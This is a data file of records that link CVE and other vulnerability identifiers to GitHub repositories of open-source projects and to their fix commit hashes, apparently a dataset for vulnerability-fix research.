+CVE-2019-1003000;https://github.com/jenkinsci/jenkins;None:None;False;fa832c58b06556d9d3e0224be28f9c8673f3230b; +CVE-2012-5783;https://github.com/apache/httpcomponents-client;None:None;False;e9f86cb2507e6df8faf664cae39172ae865f1a01; +CVE-2017-15717;https://github.com/apache/sling-org-apache-sling-xss;None:None;False;ec6764d165abc4df8cffd8439761bb2228887db9; +CVE-2019-10352;https://github.com/jenkinsci/jenkins;None:None;False;18fc7c0b466553cbd4f790db3270964305bee7f9; +CVE-2019-14751;https://github.com/nltk/nltk;None:None;False;f59d7ed8df2e0e957f7f247fe218032abdbe9a10; +CVE-2017-12794;https://github.com/django/django;None:None;False;e35a0c56086924f331e9422daa266e907a4784c; +CVE-2014-2068;https://github.com/jenkinsci/jenkins.git;None:None;False;0530a6645aac10fec005614211660e98db44b5eb; +CVE-2020-25659;https://github.com/pyca/cryptography;None:None;False;58494b41d6ecb0f56b7c5f05d5f5e3ca0320d494; +CVE-2016-9015;https://github.com/Lukasa/urllib3;None:None;False;5e36a7096455ea94fb28b623d64e1f1bad97f82; +CVE-2012-4431;https://github.com/apache/tomcat;None:None;False;bd325e29762ca3f7a0801907bfbe5471effbbfff; +CVE-2019-13177;https://github.com/apragacz/django-rest-registration;None:None;False;26d094fab65ea8c2694fdfb6a3ab95a7808b62d5; +WERKZEUG-001;https://github.com/pallets/werkzeug;None:None;False;84eabcaa81f60d47939ac2d43f01d01eeab598a4; +CVE-2019-16766;https://github.com/labd/wagtail-2fa;None:None;False;a6711b29711729005770ff481b22675b35ff5c81; +CVE-2019-10339;https://github.com/jenkinsci/jx-resources-plugin;None:None;False;f0d9fb76230b65e851095da936a439d953c5f64d; +SPARK-981;https://github.com/perwendel/spark;None:None;False;030e9d00125cbd1ad759668f85488aba1019c668; +CVE-2017-9096-2;https://github.com/itext/itextpdf;None:None;False;ad38371c396ac5ffbfb28056809e8ffaa5a18ccd; +PYPISERVER-001;https://github.com/pypiserver/pypiserver;None:None;False;1375a67c55a9b8d4619df30d2a1c0b239d7357e6; +CVE-2019-0187;https://github.com/apache/jmeter;None:None;False;a82907030db158e00d681dc5f5330085951535f3; +CVE-2011-1088;https://github.com/apache/tomcat;None:None;False;880b1a4fc424625b56c8bcd9ebf6bfe966a1dadd,3ac2b5c1611af51ee5438fd32a3254a2de1878ce,f528992ec6cd7b62c9ced5b3a7dc4cda6bfd1a5e,02780bbc6089a12b19d3d5e5dc810455ac6bfe92,9c90bdc1ad942374b1bb6b147613497970b3c8e1; +S2-028;https://github.com/apache/struts;None:None;False;5421930b49822606792f36653b17d3d95ef106f9,72471d7075681bea52046645ad7aa34e9c53751e,a89bbe22cd2461748d595a89a254de888a415e6c; +CVE-2018-1999040;https://github.com/jenkinsci/kubernetes-plugin;None:None;False;bf7a47847dfb5ef2d1e2a537e2eb9f28063988c6; +CVE-2013-5123;https://github.com/dstufft/pip;None:None;False;3ef4ee4693db5e255dcfef1acf73427f6c97646b; +CVE-2019-18213;https://github.com/angelozerr/lsp4xml;None:None;False;d172c4daff4c0229493c62812a40be8357584f7b; +CVE-2013-2186;https://github.com/apache/commons-fileupload;None:None;False;163a6061fbc077d4b6e4787d26857c2baba495d1; +CVE-2019-1000007;https://github.com/horazont/aioxmpp;None:None;False;29ff0838a40f58efe30a4bbcea95aa8dab7da475; +CVE-2020-8492;https://github.com/python/cpython;None:None;False;69cdeeb93e0830004a495ed854022425b93b3f3,b57a73694e26e8b2391731b5ee0b1be59437388,ea9e240aa02372440be8024acb110371f69c9d4; +CVE-2015-5081;https://github.com/divio/django-cms;None:None;False;f77cbc607d6e2a62e63287d37ad320109a2cc78a; +CVE-2017-1000387;https://github.com/jenkinsci/build-publisher-plugin;None:None;False;7f80f0d7c9cd96a2d660eeb8b695297bef064059,e9c1b263400e42aaa3f9fcbbd0e8b1e85c76e3a0; +CVE-2017-5664;https://github.com/apache/tomcat;None:None;False;29893e66111d33cfe99dd01cb146317c0c262ef4,25d3c0d93190ef165ecd6c744bc15b5059abfa8f,58b32048ce25cb812ae394dafb0cd57254c68155,4545dcce444aa619374a659cb450dbbd0be3c921,3242efea525df01d15da6e90ea69a9a21b10b454,e070a31ec81b56377822e44883c64abb41f36a3b,3bfe9fb886598c4d8ecbe674216152006bbce456,7d93527254d9e9371b342800617f20d13c8b85ad; +PT-2013-65;https://github.com/eclipse/jetty.project;None:None;False;0fac295cd82b59085d4aae5ca6792b2cda752455,458e511ce2f2b47fd216f68c0e385fc06a5f1d2f; +CVE-2019-12855;https://github.com/twisted/twisted;None:None;False;488bdd0b80cd1084359e34b8d36ae536520b1f86; +CVE-2010-4172;https://github.com/apache/tomcat;None:None;False;b328ce28c02ea79b5315c6ead8995ee993541430; +CVE-2020-26282;https://github.com/browserup/browserup-proxy;None:None;False;4b38e7a3e20917e5c3329d0d4e9590bed9d578ab; +CVE-2021-20228;https://github.com/ansible/ansible;None:None;False;e41d1f0a3fd6c466192e7e24accd3d1c6501111b; +CVE-2017-11427-PY3;https://github.com/onelogin/python3-saml;None:None;False;349757d98f0b7feaee867826a0782df4307fc32e; +CVE-2018-1000420;https://github.com/jenkinsci/mesos-plugin;None:None;False;e7e6397e30a612254e6033b94c21edb2324d648f; +CVE-2020-9491;https://github.com/apache/nifi;None:None;False;441781cec50f77d9f1e65093f55bbd614b8c5ec6; +CVE-2018-7206;https://github.com/jupyterhub/oauthenticator;None:None;False;1845c0e4b1bff3462c91c3108c85205acd3c75a; +CVE-2019-1003023;https://github.com/jenkinsci/warnings-ng-plugin;None:None;False;58d4cd85a7fc68ded989b6019c8c0cba3a457d15; +CVE-2018-7753;https://github.com/mozilla/bleach;None:None;False;c5df5789ec3471a31311f42c2d19fc2cf21b35ef; +CVE-2016-8747;https://github.com/apache/tomcat;None:None;False;452c8094a665ef6375530e81c033da4eeb2e4865,9601a937ff3b7ef5d04b2a0e950d0e44e1bb4cbd; +COLLECTIONS-580;https://github.com/apache/commons-collections;None:None;False;d9a00134f16d685bea11b2b12de824845e6473e3,e585cd0433ae4cfbc56e58572b9869bd0c86b611,da1a5fe00d79e1840b7e52317933e9eb56e88246,3eee44cf63b1ebb0da6925e98b3dcc6ef1e4d610,1642b00d67b96de87cad44223efb9ab5b4fb7be5,5ec476b0b756852db865b2e442180f091f8209ee,bce4d022f27a723fa0e0b7484dcbf0afa2dd210a; +JAVAMELODY-252;https://github.com/javamelody/javamelody;None:None;False;00ff3490878e78f3f8c9eb65efb054f85f6058f8; +CVE-2019-10428;https://github.com/jenkinsci/aqua-security-scanner-plugin;None:None;False;809fb7b12128eb22dbcdc4b7209465c105469833; +CVE-2018-1000111;https://github.com/jenkinsci/subversion-plugin;None:None;False;25f6afbb02a5863f363b0a2f664ac717ace743b4; +CVE-2018-15560;https://github.com/Legrandin/pycryptodome;None:None;False;d1739c62b9b845f8a5b342de08d6bf6e2722d247; +CVE-2018-20060;https://github.com/urllib3/urllib3;None:None;False;48dba048081dfcb999afcda715d17147aa15b6ea,9c9dd6f3014e89bb9c532b641abcf1b24c3896ab,f99912beeaf230ee3634b938d3ea426ffd1f3e57,2a42e70ff077006d5a6da92251ddbb2939303f94,3b5f27449e153ad05186beca8fbd9b134936fe50,3d7f98b07b6e6e04c2e89cdf5afb18024a2d804c,560bd227b90f74417ffaedebf5f8d05a8ee4f532,6245ddddb7f80740c5c15e1750e5b9f68c5b2b5f,63948f3a607ed8e7a3ce9ac4e20782359896e27e; +CVE-2018-1000519;https://github.com/aio-libs/aiohttp-session;None:None;False;6b7864004d3442dbcfaf8687f63262c1c629f569; +CVE-2016-3092-FU;https://github.com/apache/commons-fileupload;None:None;False;774ef160d591b579f703c694002e080f99bcd28b; +CVE-2014-3574;https://github.com/apache/poi;None:None;False;526abfe065b91c8baa02fd92918604e024764b82,69015a079eeb351c95c9aed6da03a0647f664dac,22aec7b4e363f61e39cc38bde84648c37003446f,6d1b0291c52c70486c25a18db4de962472910d64; +CVE-2020-15105;https://github.com/Bouke/django-two-factor-auth;None:None;False;454fd9842fa6e8bb772dbf0943976bc8e3335359; +APACHE-HTTPCLIENT-1976;https://github.com/apache/httpcomponents-client;None:None;False;c8068487fb65ba8ba3f3c74d7da101fc118b8b43; +CVE-2017-5934;https://github.com/moinwiki/moin-1.9;None:None;False;70955a8eae091cc88fd9a6e510177e70289ec024; +CVE-2020-27197;https://github.com/TAXIIProject/libtaxii;None:None;False;23c6f7b69d99e965c8d53dc4710ae64da3fb4842; +CVE-2019-1003032;https://github.com/jenkinsci/email-ext-plugin;None:None;False;53776779d3dba539facc7e3380c22671b71aad3e; +CVE-2020-15170;https://github.com/ctripcorp/apollo;None:None;False;1e61c3867d7f9f1f2d2e1b38ff6a1d9e784a9d18; +CVE-2016-2175;https://github.com/apache/pdfbox;None:None;False;6eb3ad2627d2cc7527bb3327370fa09e31907235; +CVE-2019-3559;https://github.com/facebook/fbthrift;None:None;False;a56346ceacad28bf470017a6bda1d5518d0bd943; +CVE-2019-10345;https://github.com/jenkinsci/configuration-as-code-plugin;None:None;False;73afe3cb10a723cb06e29c2e5499206aadae3a0d; +CVE-2015-3162;https://github.com/beaker-project/beaker;None:None;False;36809a80741d572af124f2a15b1fdf5c581cde46; +CVE-2018-7750;https://github.com/paramiko/paramiko;None:None;False;fa29bd8446c8eab237f5187d28787727b4610516; +JETTY-1042;https://github.com/eclipse/jetty.project;None:None;False;02dd1975ec61052cb9a17342c9bbec289257b701; +CVE-2019-14859;https://github.com/warner/python-ecdsa;None:None;False;434f5dba086995e17dddd8df06007aa5e5dd9dad; +CVE-2020-5227;https://github.com/lkiesow/python-feedgen;None:None;False;f57a01b20fa4aaaeccfa417f28e66b4084b9d0cf; +CVE-2020-11988;https://github.com/apache/xmlgraphics-commons;None:None;False;57393912eb87b994c7fed39ddf30fb778a275183; +CVE-2018-1000089;https://github.com/jenkinsci/pipeline-build-step-plugin;None:None;False;3dfefdec1f7b2a4ee0ef8902afdea720b1572cb3; +CVE-2017-5200;https://github.com/saltstack/salt;None:None;False;c59ae9a82cd600859b76809aeb14367f86abaf0e; +CVE-2019-10141;https://github.com/openstack/ironic-inspector;None:None;False;9d107900b2e0b599397b84409580d46e0ed16291; +HADOOP-14833;https://github.com/apache/hadoop;None:None;False;87f63b6479330840e9d708a729355948bb91fd4d; +CVE-2019-16328;https://github.com/tomerfiliba/rpyc;None:None;False;fc3b0b007847385fc83ddd287b5e6bc7a5ea51a2; +FLASK-IPBAN-001;https://github.com/Martlark/flask-ipban;None:None;False;7ab2820a2dcac4f7602a5fc2bd3f07f701203076; +CVE-2019-1003019;https://github.com/jenkinsci/github-oauth-plugin;None:None;False;3fcc367022c58486e5f52def3edbac92ed258ba4; +CVE-2020-29651;https://github.com/pytest-dev/py;None:None;False;4a9017dc6199d2a564b6e4b0aa39d6d8870e4144; +CVE-2017-1000398;https://github.com/jenkinsci/jenkins;None:None;False;da06fd471cea79123821c778228eeb08e1cedcc7; +CVE-2019-10461;https://github.com/jenkinsci/dynatrace-plugin;None:None;False;373adaa1161d59ccd4e5e3469a9b6aeec17968ae; +CVE-2017-11610;https://github.com/Supervisor/supervisor;None:None;False;058f46141e346b18dee0497ba11203cb81ecb19; +CVE-2016-5007-SEC;https://github.com/spring-projects/spring-security.git;None:None;False;e4c13e3c0ee7f06f59d3b43ca6734215ad7d8974; +CVE-2018-1192;https://github.com/cloudfoundry/uaa;None:None;False;a61bfabbad22f646ecf1f00016b448b26a60daf; +CVE-2018-1000518;https://github.com/tornadoweb/tornado;None:None;False;7bd3ef349214843141c0f1c3286ee8ad5e98aac3; +CVE-2018-1000407;https://github.com/jenkinsci/jenkins;None:None;False;df87e12ddcfeafdba6e0de0e07b3e21f8473ece6; +CVE-2018-1000055;https://github.com/jenkinsci/android-lint-plugin;None:None;False;4a19f962ebde3f705880b0e8148731d8dac9db2d; +CVE-2018-18074;https://github.com/requests/requests;None:None;False;c45d7c49ea75133e52ab22a8e9e13173938e36ff; +CVE-2019-19844;https://github.com/django/django;None:None;False;302a4ff1e8b1c798aab97673909c7a3dfda42c2,4d334bea06cac63dc1272abcec545b85136cca0,f4cff43bf921fcea6a29b726eb66767f67753fa; +CVE-2019-10338;https://github.com/jenkinsci/jx-resources-plugin;None:None;False;f0d9fb76230b65e851095da936a439d953c5f64d; +CVE-2019-16539;https://github.com/jenkinsci/support-core-plugin;None:None;False;6b177ea7cc7347e13fa87174472400bbbe78d422; +CVE-2020-13867;https://github.com/open-iscsi/targetcli-fb;None:None;False;493b62ee9e2b1d827d2faad8c77de6a89c7e21a9; +CVE-2019-10325;https://github.com/jenkinsci/warnings-ng-plugin;None:None;False;0b0016b5f32547c4e2f722aeb2243b4ea2e3be8b; +CVE-2018-12036;https://github.com/jeremylong/DependencyCheck;None:None;False;c106ca919aa343b95cca0ffff0a0b5dc20b2baf7; +CVE-2020-9492;https://github.com/apache/hadoop;None:None;False;2c70c0f74c7915380e5bfb3a79ef5713e854f8e,53ae2f9273ea014fe5d71c46c452fb64dbbd69c,ba66f3b454a5f6ea84f2cf7ac0082c555e2954a,e9cf454ac2c713e94ec92a74e9fd9959555052e,28715b584ab25dedc600cc2d5d22866865026bf; +CVE-2019-10328;https://github.com/jenkinsci/workflow-remote-loader-plugin;None:None;False;6f9d60f614359720ec98e22b80ba15e8bf88e712; +CVE-2019-10396;https://github.com/jenkinsci/dashboard-view-plugin;None:None;False;115238da2a8899358b32ee14e7076df23747d6c9; +CVE-2013-0158;https://github.com/jenkinsci/jenkins.git;None:None;False;a9aff088f327278a8873aef47fa8f80d3c5932fd,c3d8e05a1b3d58b6c4dcff97394cb3a79608b4b2,3dc13b957b14cec649036e8dd517f0f9cb21fb04,4895eaafca468b7f0f1a3166b2fca7414f0d5da5,94a8789b699132dd706021a6be1b78bc47f19602; +DJANGO-CA-001;https://github.com/mathiasertl/django-ca;None:None;False;d19009faecbad3f8a95f8a66a8fe3cfce14d14ce; +CVE-2014-2062;https://github.com/jenkinsci/jenkins.git;None:None;False;5548b5220cfd496831b5721124189ff18fbb12a3; +CVE-2018-7749;https://github.com/ronf/asyncssh;None:None;False;16e6ebfa893167c7d9d3f6dc7a2c0d197e47f43a; +OIC-363;https://github.com/schlenk/pyoidc;None:None;False;b9279ae488500fb669e9a46324adee21040692f5,eee497ccec8219321dddcf5b7aaa4fa0334d397a; +CVE-2018-1000408;https://github.com/jenkinsci/jenkins;None:None;False;01157a699f611ca7492e872103ac01526a982cf2; +CVE-2018-1000106;https://github.com/jenkinsci/gerrit-trigger-plugin;None:None;False;a222f2d9d1bca3422e6a462a7f587ae325455b80; +CVE-2021-25329;https://github.com/apache/tomcat;None:None;False;74b105657ffbd1d1de80455f03446c3bbf30d1f,93f0cc403a9210d469afc2bd9cf03ab3251c6f3,4785433a226a20df6acbea49296e1ce7e23de45,6d66e99ef85da93e4d2c2a536ca51aa3418bfaf; +CVE-2020-15271;https://github.com/d0c-s4vage/lookatme;None:None;False;72fe36b784b234548d49dae60b840c37f0eb8d84; +CVE-2018-1000159;https://github.com/tomato42/tlslite-ng;None:None;False;3674815d1b0f7484454995e2737a352e0a6a93d8; +CVE-2019-1003036;https://github.com/jenkinsci/azure-vm-agents-plugin;None:None;False;6cf1e11778993988ded08eb15ea051541341ec12; +CVE-2019-10160;https://github.com/python/cpython;None:None;False;f61599b050c621386a3fc6bc480359e2d3bb93d; +CVE-2020-29456;https://github.com/ciur/papermerge;None:None;False;e1aedd305e9b66935a9195e6de1a0eaeb3aedda8; +CVE-2019-1003085;https://github.com/jenkinsci/zephyr-enterprise-test-management-plugin;None:None;False;a2a698660c12d78e06f78c813c3ff10b4c30db16; +CVE-2013-7251;https://github.com/micromata/projectforge-webapp.git;None:None;False;422de35e3c3141e418a73bfb39b430d5fd74077e; +CVE-2020-11093;https://github.com/hyperledger/indy-node;None:None;False;55056f22c83b7c3520488b615e1577e0f895d75a; +CVE-2013-4155;https://github.com/openstack/swift;None:None;False;6b9806e0e8cbec60c0a3ece0bd516e0502827515; +CVE-2018-1000421;https://github.com/jenkinsci/mesos-plugin;None:None;False;e7e6397e30a612254e6033b94c21edb2324d648f; +CVE-2021-23926;https://github.com/apache/xmlbeans;None:None;False;a2604e07eeb04bd9a88f8624c3b8efd57b88237c,80cb805eb1488ba3a16c427866fa8ae1f52ff0c5,88668f433776e9e795b54263455427d42a456f7f; +CVE-2018-1000872;https://github.com/OpenKMIP/PyKMIP;None:None;False;06c960236bcaf6717fc5cf66cf8b5179804c5a05; +CVE-2017-1000391;https://github.com/jenkinsci/jenkins;None:None;False;566a8ddb885f0bef9bc848e60455c0aabbf0c1d3; +CVE-2019-10359;https://github.com/jenkinsci/m2release-plugin;None:None;False;2f1117d011e1ef200f28bbb0c24bf918b89704b6; +CVE-2014-2065;https://github.com/jenkinsci/jenkins.git;None:None;False;a0b00508eeb74d7033dc4100eb382df4e8fa72e7; +CVE-2019-1003004;https://github.com/jenkinsci/jenkins;None:None;False;8c490d14c4ffe6162f6e97d25a66612330fe2ace,da135e7ecb72469c17a47640314e424e314269b0; +CVE-2015-7337;https://github.com/ipython/ipython;None:None;False;0a8096adf165e2465550bd5893d7e352544e596; +MAVEN-SHARED-UTILS-297;https://github.com/apache/maven-shared-utils;None:None;False;6798f3033c3c5144e52c5aa8e1be584ea97527d,f751e614c09df8de1a080dc1153931f3f68991c; +CVE-2020-26943;https://github.com/openstack/blazar-dashboard;None:None;False;ee10b2c5c195088ec14725b790c17289ad20ed6,168b4ae052480912fa6fdd2c77e16cd87152830,33c58438abf8221291d264db26a061279d4f22c,5c7608dfa24dc5a5a3f18af09d35e8ea8760aee,63e9c5d25617467016eea1dff0a34803c86b095; +CVE-2019-10318;https://github.com/jenkinsci/azure-ad-plugin;None:None;False;70983d1a6528847ccd6e7f124450c578c42d194f; +INDICO-2019-10-3;https://github.com/indico/indico;None:None;False;8000673a35386c163ef26084256a7dc3c7034af,ad41a47be6984430af6b81d75459cc2355339f7; +CVE-2019-10317;https://github.com/jenkinsci/sitemonitor-plugin;None:None;False;a7210254b4dc9df15115e94ec8dba62b1e86493a; +CVE-2015-8103;https://github.com/jenkinsci/jenkins;None:None;False;5bd9b55a2a3249939fd78c501b8959a804c1164b; +CVE-2019-10302;https://github.com/jenkinsci/jira-ext-plugin;None:None;False;e252f4084089e5cfb4c7bad389d3d20f3ec594fb; +CVE-2019-16548;https://github.com/jenkinsci/google-compute-engine-plugin;None:None;False;1dfef77f37bf5c005ac02c1bd79e44289b4d7da9,aaf81996741c67229982f70b3eaa83894e035025; +CVE-2020-7212;https://github.com/urllib3/urllib3;None:None;False;a2697e7c6b275f05879b60f593c5854a816489f0; +CVE-2013-2233;https://github.com/ansible/ansible;None:None;False;c593454fd075fe4a2385bf88aaef054a0751a227,f782c237c486edc42076d4933739d45a6b42f0a2; +CVE-2015-1838;https://github.com/saltstack/salt;None:None;False;e11298d7155e9982749483ca5538e46090caef9c; +CVE-2019-1020006;https://github.com/inveniosoftware/invenio-app;None:None;False;0feb40ad3d879eb5b2201780add702a8808f147; +CVE-2019-1003024;https://github.com/jenkinsci/script-security-plugin;None:None;False;3228c88e84f0b2f24845b6466cae35617e082059; +CVE-2020-28493;https://github.com/pallets/jinja;None:None;False;ef658dc3b6389b091d608e710a810ce8b87995b3; +CVE-2017-16618;https://github.com/tadashi-aikawa/owlmixin;None:None;False;5d0575303f6df869a515ced4285f24ba721e0d4e; +CVE-2018-12537;https://github.com/eclipse/vert.x;None:None;False;1bb6445226c39a95e7d07ce3caaf56828e8aab72; +CVE-2020-25638;https://github.com/hibernate/hibernate-orm;None:None;False;59fede7acaaa1579b561407aefa582311f7ebe78; +CVE-2020-27218;https://github.com/eclipse/jetty.project;None:None;False;6c94ef5848abb1778a32161e5c085a5b195baf01; +CVE-2020-28473;https://github.com/bottlepy/bottle;None:None;False;57a2f22e0c1d2b328c4f54bf75741d74f47f1a6b; +CVE-2016-10127;https://github.com/rohe/pysaml2;None:None;False;6e09a25d9b4b7aa7a506853210a9a14100b8bc9b; +CVE-2014-1829;https://github.com/requests/requests;None:None;False;97cf16e958a948ecf30c3019ae94f2e7ec7dcb7f,f1893c835570d72823c970fbd6e0e42c13b1f0f2,fe4c4f146124d7fba2e680581a5d6b9d98e3fdf8,7ba5a534ae9fc24e40b3ae6c480c9075d684727e; +CVE-2020-25711;https://github.com/infinispan/infinispan;None:None;False;8dce81940cfef3d18057158112610ddb9493172c; +PRIMEFACES-1194;https://github.com/primefaces/primefaces;None:None;False;afcec249b82cad60978e8ecb3926822d3f51b25a,e8c0baae853c48bb1fb2d39833c5b2b6af837616; +CVE-2020-26217;https://github.com/x-stream/xstream;None:None;False;0fec095d534126931c99fd38e9c6d41f5c685c1a; +CVE-2020-11651;https://github.com/saltstack/salt;None:None;False;a67d76b15615983d467ed81371b38b4a17e4f3b,f47e4856497231eb672da2ce0df3e641581d47e,ffea7ffa215313f68b42f82984b0441e1017330; +CVE-2020-11987;https://github.com/apache/xmlgraphics-batik;None:None;False;0ef5b661a1f77772d1110877ea9e0287987098f6; +CVE-2018-1000009;https://github.com/jenkinsci/checkstyle-plugin;None:None;False;365d6164ebce7b65ae010c71016924ef8b98c1a0; +CVE-2019-16554;https://github.com/jenkinsci/build-failure-analyzer-plugin;None:None;False;f316c885552ac75289cbb11b2af5757f18784bcb; +CVE-2017-16616;https://github.com/Stranger6667/pyanyapi;None:None;False;810db626c18ebc261d5f4299d0f0eac38d5eb3cf; +CVE-2018-19351;https://github.com/jupyter/notebook;None:None;False;107a89fce5f413fb5728c1c5d2c7788e1fb17491; +CVE-2021-3137;https://github.com/xwiki/xwiki-commons;None:None;False;327fa15ba24c2152940f09e459d0fe934756dde4; +CVE-2014-9970;https://github.com/jboss-fuse/jasypt;None:None;False;8e62852a8018978ee19d39056c650fb66ffa0ff6; +CVE-2019-1020005;https://github.com/inveniosoftware/invenio-communities;None:None;False;505da72c5acd7dfbd4148f884c73c9c3372b76f4; +CVE-2016-3093;https://github.com/jkuhnert/ognl;None:None;False;ae43073fbf38db8371ff4f8bf2a966ee3b5f7e92; +CVE-2019-10353;https://github.com/jenkinsci/jenkins;None:None;False;772152315aa0a9ba27b812a4ba0f3f9b64af78d9; +CVE-2012-3546;https://github.com/apache/tomcat;None:None;False;f78c0cdfc8a3c2efdfe6df6b69e5e3daafa3f588; +CVE-2012-2098;https://github.com/apache/commons-compress;None:None;False;654222e628097763ee6ca561ae77be5c06666173,b06f7b41c936ef1a79589d16ea5c1d8b93f71f66,cca0e6e5341aacddefd4c4d36cef7cbdbc2a8777,020c03d8ef579e80511023fb46ece30e9c3dd27d,fdd7459bc5470e90024dbe762249166481cce769,0600296ab8f8a0bbdfedd483f51b38005eb8e34e,6ced422bf5eca3aac05396367bafb33ec21bf74e,8f702469cbf4c451b6dea349290bc4af0f6f76c7,6e95697e783767f3549f00d7d2e1b002eac4a3d4,1ce57d976c4f25fe99edcadf079840c278f3cb84; +CVE-2018-1000861;https://github.com/jenkinsci/jenkins;None:None;False;47f38d714c99e1841fb737ad1005618eb26ed852; +CVE-2018-1000805;https://github.com/paramiko/paramiko;None:None;False;56c96a659658acdbb873aef8809a7b508434dcce; +CVE-2021-22112;https://github.com/spring-projects/spring-security;None:None;False;c72a6fac04853912a4b7caad5f0500f2aace5a79; +CVE-2019-11278;https://github.com/cloudfoundry/uaa;None:None;False;dbbbe38fc5a2af35257b5a349b7cae5a5166df52; +CVE-2019-1003028;https://github.com/jenkinsci/jms-messaging-plugin;None:None;False;be87ad81c8b3aac6486ca787e3953c8fb6271997; +CVE-2018-1000862;https://github.com/jenkinsci/jenkins;None:None;False;c19cc705688cfffa4fe735e0edbe84862b6c135f; +CVE-2019-1003027;https://github.com/jenkinsci/octopusdeploy-plugin;None:None;False;40e04160ac77190a51c8e2c3164a0151441efdf4; +CVE-2020-28724;https://github.com/pallets/werkzeug;None:None;False;413a978fa99f64d2abdfb8bddd1da5bf44bc52ec; +CVE-2019-10341;https://github.com/jenkinsci/docker-plugin;None:None;False;6ad27199f6fad230be72fd45da78ddac85c075db; +CVE-2014-0074;https://github.com/apache/shiro;None:None;False;9137e6cc45922b529fb776c6857647a3935471bb; +CVE-2016-8640;https://github.com/geopython/pycsw;None:None;False;2565ab332d3ccae328591ea9054d0387a90f2e86; +CVE-2019-10682;https://github.com/relekang/django-nopassword;None:None;False;d8b4615f5fbfe3997d96cf4cb3e342406396193c; +CVE-2018-1313;https://github.com/apache/derby;None:None;False;4da5b2db5f3a60c1fa8ef616d88a7efe28b0c9d; +CVE-2009-3555-JETTY;https://github.com/eclipse/jetty.project;None:None;False;102625b86c8e82e0e3d02a71028ba62795aff52b,b4390f98529fce165e6394b94122b427fdfb8a5e,b90ad09443e1771e37d23e393afe842759c20454; +CVE-2018-1000105;https://github.com/jenkinsci/gerrit-trigger-plugin;None:None;False;a222f2d9d1bca3422e6a462a7f587ae325455b80; +JAVAMELODY-631;https://github.com/javamelody/javamelody;None:None;False;dd8816863d8d943f819a3fa797c349236e7546d4; +OIC-349;https://github.com/OpenIDC/pyoidc;None:None;False;64665112587ef43a57cb09442dd5dd3d175f583e; +CVE-2017-1000400;https://github.com/jenkinsci/jenkins;None:None;False;b2083a387a5bdb6f7ee7f7c81a1f6312aca2a558; +PLANEMO-45096;https://github.com/galaxyproject/planemo;None:None;False;1facb88bb6268812901291f27444cf7cdc9b9d85; +CVE-2019-1003016;https://github.com/jenkinsci/job-import-plugin;None:None;False;1d81e59330d371d15d3672dabc17d35dcd9fb824; +CVE-2019-16786;https://github.com/Pylons/waitress;None:None;False;f11093a6b3240fc26830b6111e826128af7771c3; +CVE-2017-4995;https://github.com/spring-projects/spring-security;None:None;False;5dee8534cd1b92952d10cc56335b5d5856f48f3b; +HOMEASSISTANT-001;https://github.com/home-assistant/home-assistant;None:None;False;0f12b37977766647dcc34a0189b37c7379b5f665; +CVE-2021-21292;https://github.com/traccar/traccar;None:None;False;cc69a9907ac9878db3750aa14ffedb28626455da; +DJANGO-STORAGES-001;https://github.com/jschneier/django-storages;None:None;False;6ee6a739752923c60eaa1e82262c1d07208ec7f6; +CVE-2015-8034;https://github.com/saltstack/salt;None:None;False;097838ec0c52b1e96f7f761e5fb3cd7e79808741; +CVE-2021-21318;https://github.com/opencast/opencast;None:None;False;b18c6a7f81f08ed14884592a6c14c9ab611ad450; +CVE-2020-26116;https://github.com/python/cpython;None:None;False;ca75fec1ed358f7324272608ca952b2d8226d11,f02de961b9f19a5db0ead56305fe0057a78787a,27b811057ff5e93b68798e278c88358123efdc7,524b8de630036a29ca340bc2ae6fd6dc7dda8f4,668d321476d974c4f51476b33aaca870272523b,8ca8a2e8fb068863c1138f07e3098478ef8be12; +CVE-2019-15486;https://github.com/ierror/django-js-reverse;None:None;False;78d6aff2276f2d341f643b095515f8aaba5e67c2; +CVE-2019-16552;https://github.com/jenkinsci/gerrit-trigger-plugin;None:None;False;bdc94d3e23df0ad6a64565c732498f89ff743b51; +CVE-2018-1000054;https://github.com/jenkinsci/ccm-plugin;None:None;False;066cb43b4413b3490d822ec8b8a32072ebd213ca; +CVE-2018-7536;https://github.com/django/django;None:None;False;1ca63a66ef3163149ad822701273e8a1844192c; +CVE-2020-13952;https://github.com/apache/incubator-superset;None:None;False;465572325b6c880b81189a94a27417bbb592f540; +CVE-2021-21238;https://github.com/IdentityPython/pysaml2;None:None;False;1d8fd268f5bf887480a403a7a5ef8f048157cc14; +CVE-2013-2071;https://github.com/apache/tomcat;None:None;False;f505d993d47d75d762c632cef6a622928ed4bcd6; +CVE-2018-1000410;https://github.com/jenkinsci/jenkins;None:None;False;7366cc50106442a021c5178cd101057ecc08f2c2; +CVE-2019-1003043;https://github.com/jenkinsci/slack-plugin;None:None;False;0268bbefdcc283effd27be5318770f7e75c6f102; +CVE-2019-10459;https://github.com/jenkinsci/mattermost-plugin;None:None;False;c6e509307812d93ba295a35dea95016f007de158; +CVE-2020-11979;https://github.com/apache/ant;None:None;False;87ac51d3c22bcf7cfd0dc07cb0bd04a496e0d428; +CVE-2012-0213;https://github.com/apache/poi;None:None;False;25bc679244188d63de690354db0e3f301291e252; +CVE-2018-1000843;https://github.com/spotify/luigi;None:None;False;06e3d9163c36f347cef09d9442aff55a10660f31; +CVE-2019-10362;https://github.com/jenkinsci/configuration-as-code-plugin;None:None;False;b48a292112c532ab1447b864c7d30c2cae733ac8; +CVE-2012-5633;https://github.com/apache/cxf;None:None;False;db11c9115f31e171de4622149f157d8283f6c720,94a98b3fe9c79e2cf3941acbbad216ba54999bc0,1a6b532d53a7b98018871982049e4b0c80dc837c; +CVE-2009-0038;https://github.com/apache/geronimo;None:None;False;f8a612df7b06729bfd6c826e1a110d4bb40dc1f5,67dda0760bb0925ead201ddd5d809ff53686d63f,aa0c2c26dde8930cad924796af7c17a13d236b16; +CVE-2019-10366;https://github.com/jenkinsci/skytap-cloud-plugin;None:None;False;167986a84d1d15b525eaf0232b1c1a7c47aef670; +CVE-2018-16984;https://github.com/django/django;None:None;False;bf39978a53f117ca02e9a0c78b76664a41a54745; +CVE-2019-10365;https://github.com/jenkinsci/google-kubernetes-engine-plugin;None:None;False;544358bb731986a3269ee1a631405ea7668b72ac,c45a917eea3702e2b9678b13bbe6e58b41cfc8d3,cdd4d1b671dc1dd87976da5aa9d1375f929f6bd1; +CVE-2007-0450;https://github.com/apache/tomcat;None:None;False;1735d7f55094c3775c7d94e4f8568336dbe1a738; +MSGPACK-001;https://github.com/msgpack/msgpack-python;None:None;False;3b80233592674d18c8db7a62fa56504a5a285296; +DJANGO-30307;https://github.com/django/django;None:None;False;1279fb4a00c23ab0b9aeff8dd205661d4e9a811; 